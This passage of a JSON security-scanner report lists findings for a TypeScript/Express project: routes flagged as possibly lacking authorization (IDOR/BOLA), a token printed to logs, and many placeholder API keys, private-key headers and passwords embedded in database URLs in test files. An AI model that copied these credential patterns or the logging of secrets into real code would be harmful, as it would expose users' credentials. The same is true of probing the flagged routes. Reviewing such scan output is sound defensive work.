Endpoint: GET /internal/stop-gate/annotations/:eventId."}, "properties": {"repobilityId": 10582, "scanner": "repobility-access-control", "fingerprint": "66492de225ff5ddf8e83f55064739742dd898053b303fff51413649841dffc9a", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/internal/stop-gate/annotations/:eventId", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|1817|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 1817}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: GET /moltbridge/trust/:agentId."}, "properties": {"repobilityId": 10581, "scanner": "repobility-access-control", "fingerprint": "2389f6d4c6bf094ac42d9c95cf470198c083c9b74a5738622d7d647c3dc03b31", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/moltbridge/trust/:agentId", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/moltbridge/routes.ts|73|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/moltbridge/routes.ts"}, "region": {"startLine": 73}}}]}, {"ruleId": "SEC020", "level": "error", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 10556, "scanner": "repobility-threat-engine", "fingerprint": "399d51c0123ffc5301cf22efbbe6d073391bea754acca69be827646f0dd810f7", "category": "credential_exposure", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Credential-bearing variable appears to be printed or logged", "evidence": {"match": "print(d.get('token','')", "reason": "Credential-bearing variable appears to be printed or logged", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.85, "correlation_key": "secret|token|263|print d.get token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/PostUpdateMigrator.ts"}, "region": {"startLine": 2638}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16793, "scanner": "repobility", 
"fingerprint": "8a14c1e34d492061ede52980ddb25329", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:secret123@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 465}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16792, "scanner": "repobility", "fingerprint": "12903d76e837c25c7a5121fed96df724", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:p4ssw0rd@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 143}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16791, "scanner": "repobility", "fingerprint": "15c277fdddda99fa0eb047416ef2622c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 833}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16790, "scanner": "repobility", "fingerprint": 
"aaad0665ffac15e8826c2257aa9e7f2a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "redis://default:mypassword@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 297}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16789, "scanner": "repobility", "fingerprint": "01c32203eb964bd3dd5112452518c419", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "mongodb://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 290}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16788, "scanner": "repobility", "fingerprint": "b231ac2e13e282bbf5fd7a893cdfb0d3", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "mysql://root:password@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 283}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16787, "scanner": "repobility", "fingerprint": "6c5f086b02208e1990ba6b09c6c645d1", 
"category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:secretpass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 276}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16786, "scanner": "repobility", "fingerprint": "b8855a5e781f8a19d643eaeb3a62f581", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 393}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16785, "scanner": "repobility", "fingerprint": "4e9650b6169e28e04a08561949437016", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:supersecret@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 250}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16784, "scanner": "repobility", "fingerprint": "c4bc8396b2a8216f087e8656337e9d3c", "category": "credential_exposure", "severity": 
"critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 193}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16783, "scanner": "repobility", "fingerprint": "78276729c6df0b944532646b4eb6c961", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 71}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16782, "scanner": "repobility", "fingerprint": "b3128143e06c29c180ba898ae9dd8cdf", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 68}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16781, "scanner": "repobility", "fingerprint": "c53de5993124bbb83f7b01f24d75ca6d", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", 
"isResolved": false, "reason": "", "evidence": {"snippet": "mongodb://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 186}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16780, "scanner": "repobility", "fingerprint": "8ab55593b1df672913480d7ae88f53ff", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:secretpass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 176}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16678, "scanner": "repobility", "fingerprint": "e2e833d05fb3a37690221469ac82ebbb", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-lifecycle.test.ts"}, "region": {"startLine": 95}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16677, "scanner": "repobility", "fingerprint": "a0492d18a9569fc7c67de43baceabb03", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", 
"evidence": {"snippet": "ghp_AbCdEfGhIjKlMnOpQrStUvWxYz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-lifecycle.test.ts"}, "region": {"startLine": 81}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16676, "scanner": "repobility", "fingerprint": "d77bcc5cf21576940b4b288d96681a48", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 1358}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16675, "scanner": "repobility", "fingerprint": "5b5874bb31ca2a698fa802c4bfe3294c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 96}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16674, "scanner": "repobility", "fingerprint": "10db179a2a45bd6a66d9a0084c248f31", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": 
{"snippet": "ghp_concurrent2bbbbbbbbbbbbbbbbbbbbbbbbb", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 1423}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16673, "scanner": "repobility", "fingerprint": "83641e8470f627237caf95580ca4c51e", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_AbCdEfGhIjKlMnOpQrStUvWxYz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 1335}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16672, "scanner": "repobility", "fingerprint": "99dc670ffadb4f0ce090365b60610f4d", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 147}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16671, "scanner": "repobility", "fingerprint": "76f95dc3d6cce4dd4c97d61df27f79d0", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", 
"evidence": {"snippet": "xoxb-1234567890-abcdefghij-klmnopqrstuvwx", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 100}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16670, "scanner": "repobility", "fingerprint": "5c2c0430cb0c1b377e9a1a6c63061ed3", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 91}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16669, "scanner": "repobility", "fingerprint": "44a8698cade3d7e8d307c2738c2d5542", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 399}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16668, "scanner": "repobility", "fingerprint": "c72508aa88fb7575538181e5e921aafe", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": 
false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 386}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16667, "scanner": "repobility", "fingerprint": "5a9d3d025096b55b7d77de1d6e248f1b", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 154}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16666, "scanner": "repobility", "fingerprint": "af7699c71a1fc4f83fe2de730c10866a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 80}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16665, "scanner": "repobility", "fingerprint": "bb722c2ede3f3bd19b939eafa77e01bd", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", 
"isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 457}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16664, "scanner": "repobility", "fingerprint": "ffc6952e187e3a723b6cf49139f5c4cd", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 108}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16663, "scanner": "repobility", "fingerprint": "6a313836f19718a7161cec347a229d77", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-1234-5678-abcdef", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 545}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16662, "scanner": "repobility", "fingerprint": "77d4c8c737338141deab5ef59266f5cf", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": 
{"snippet": "ghp_abcdefghijklmnopqrstuvwxyz0123456789", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 531}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16661, "scanner": "repobility", "fingerprint": "e39a0771300f695b0db403aa5c151b83", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_aaaa1111bbbb2222cccc3333dddd4444eeee", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CoherenceGateE2E.test.ts"}, "region": {"startLine": 483}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16660, "scanner": "repobility", "fingerprint": "ae9375c657215bdc7d7a83bd9874e98f", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CoherenceGateE2E.test.ts"}, "region": {"startLine": 486}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16659, "scanner": "repobility", "fingerprint": "8cdaf44129ab1502164cb6036333e00b", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": 
"AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 154}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16658, "scanner": "repobility", "fingerprint": "ea99c3a9ac7db769384dac11a4a7f17a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 151}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16657, "scanner": "repobility", "fingerprint": "62420f8b3e8baf38c48a906d8276618a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 328}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16656, "scanner": "repobility", "fingerprint": "39dc9addb300d017bd70060b1ef6ae36", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh12", 
"aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 335}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16655, "scanner": "repobility", "fingerprint": "9a4e792db66f3d105a2898a0413668f2", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh12", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 316}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16654, "scanner": "repobility", "fingerprint": "d2491a025329805769afd74409722a99", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 310}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16653, "scanner": "repobility", "fingerprint": "d18a34d6cf37ab7f96e4e6f24ba52fe4", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": 
["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 269}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16652, "scanner": "repobility", "fingerprint": "14feb4fd1c7972ac697aee07a890c9df", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 262}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16651, "scanner": "repobility", "fingerprint": "31b42fcb2a43c8b0b0e7816446495f3f", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 82}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16650, "scanner": "repobility", "fingerprint": "e09297f477fb2fee5f5307d5a3ed0b94", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-123456789012-abcdefghijk", "aljefra_cwe": ["CWE-798"], 
